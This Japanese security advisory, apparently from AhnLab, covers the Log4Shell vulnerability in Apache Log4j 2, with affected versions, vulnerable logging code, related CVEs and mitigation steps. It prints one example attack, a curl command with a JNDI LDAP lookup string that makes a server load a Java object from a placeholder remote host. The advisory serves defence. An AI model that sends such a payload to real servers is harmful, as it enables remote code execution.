Apache Log4j 2 脆弱性に注意、およびアップデートの推奨

Apache Log4j 2 脆弱性(CVE-2021-44228)が2021年12月10日、POC と共に Twitter および Github に公開された。この脆弱性は Log4j ソフトウェアのリモートコード実行(RCE)の脆弱性であり、ログメッセージにリモートの Java オブジェクトのアドレスを含ませ、脆弱なサーバーで実行させることができる。これはアリババのクラウドセキュリティチームが2021年11月24日に Apache ソフトウェア財団に最初に報告したものであり、最初のパッチは2021年12月6日に配布された。その後もパッチが配布され続けており、その内容は以下の通りである。

1. 脆弱性の対象およびバージョン

以下の条件と一致する製品は、この脆弱性の影響を受ける。

  • Apache Log4j 2.0-beta9 ~ 2.12.1 および 2.13.0 ~ 2.15.0 バージョン
  • Apache Log4j 1.2.x のすべてのバージョン

2. 脆弱性を利用した攻撃の方法

Log4j を利用するサービスにおいて user-agent で送信された文字列をログとして記録するコードが含まれている場合、以下のように攻撃を実行することができる。

[サーバーソースコードの一部]

static Logger log = LogManager.getLogger(VulnerableLog4jExampleHandler.class.getName());
...
String userAgent = he.getRequestHeader("user-agent");    
String response = "<h1>Hello There, " + userAgent + "!</h1>";
log.error("Request User Agent:{}", userAgent);
...

[脆弱性を利用した攻撃]

xxx.xxx.xxx.xxx/a に位置する Java オブジェクトを自動でサーバーから実行させる攻撃
ex) # curl 127.0.0.1:8080 -H ‘X-Api-Version: ${jndi:ldap://xxx.xxx.xxx.xxx/a}’

3. 解決済みの脆弱性

  • Log4j 2.x バージョンにおいて、攻撃者がログメッセージによって遠隔でコード実行が可能な脆弱性 (CVE-2021-44228, CVSS 10.0)
  • Log4j 2.x バージョンにおいて、攻撃者がログメッセージによってサービス妨害エラー(Denied of Service)を発生させることのできる脆弱性 (CVE-2021-45046, CVSS 3.7)
  • Log4j 1.2.x バージョンにおいて、攻撃者がログメッセージによって遠隔でコード実行が可能な脆弱性 (CVE-2021-4104)

4. AhnLab 製品の対応現況

1) 2021年12月14日のアップデートを通じて脆弱性パッチが以下のように提供

2) Log4j のパッチが困難な場合、脆弱性緩和適用ソリューション (ATIP セキュリティ勧告文を参照)

  • バージョン : Log4j 2.0-beta9 以上 2.15.0 以下のバージョン(Log4j 2.12.2 バージョンは除外)
    JndiLookup クラスを以下のように削除
    # zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
  •  バージョン : Log4j 1.x バージョン
    Log4j 1.x で JMSAppender 使用状況を確認後、該当機能の停止

5. AhnLab 製品の対応現況

AhnLab では、TG/IPX、AIPS、HIPS 製品を通じてこの脆弱性の検知が可能である。

関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。

参照 1) https://www.boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=36389
参照 2) https://atip.ahnlab.com/ti/contents/security-advisory?i=0a053796-66db-4ce0-9c30-d3c19060670e

4.6 8 votes
評価する
guest
0 コメント
Inline Feedbacks
View all comments